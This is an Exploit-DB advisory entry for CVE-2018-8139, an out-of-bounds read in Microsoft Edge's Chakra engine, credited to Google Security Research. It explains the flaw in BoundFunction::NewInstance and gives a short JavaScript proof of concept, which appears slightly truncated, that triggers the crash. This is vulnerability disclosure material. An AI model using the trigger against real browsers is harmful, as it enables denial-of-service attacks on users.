Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read

EDB-ID: 45012
Author: Google Security Research
Published: 2018-07-12
CVE: CVE-2018-8139
Type: Dos
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: Denial of Service (DoS), Out Of Bounds
Vulnerable App: N/A

 BoundFunction::NewInstance is used to handle calls to a bound function. The method first allocates a new argument array and copies the prepended arguments and others into the new argument array and calls the actual function. The problem is, it doesn't care about the CallFlags_ExtraArg flag which indicates that there's an extra argument ( in the PoC) at the end of the argument array. So the size of the new argument array created with the CallFlags_ExtraArg flag will be always 1 less then required, this leads to an OOB read. 


function func() {;

let bound = func.bind({}, 1);

Reflect.construct(bound, []);

Related Posts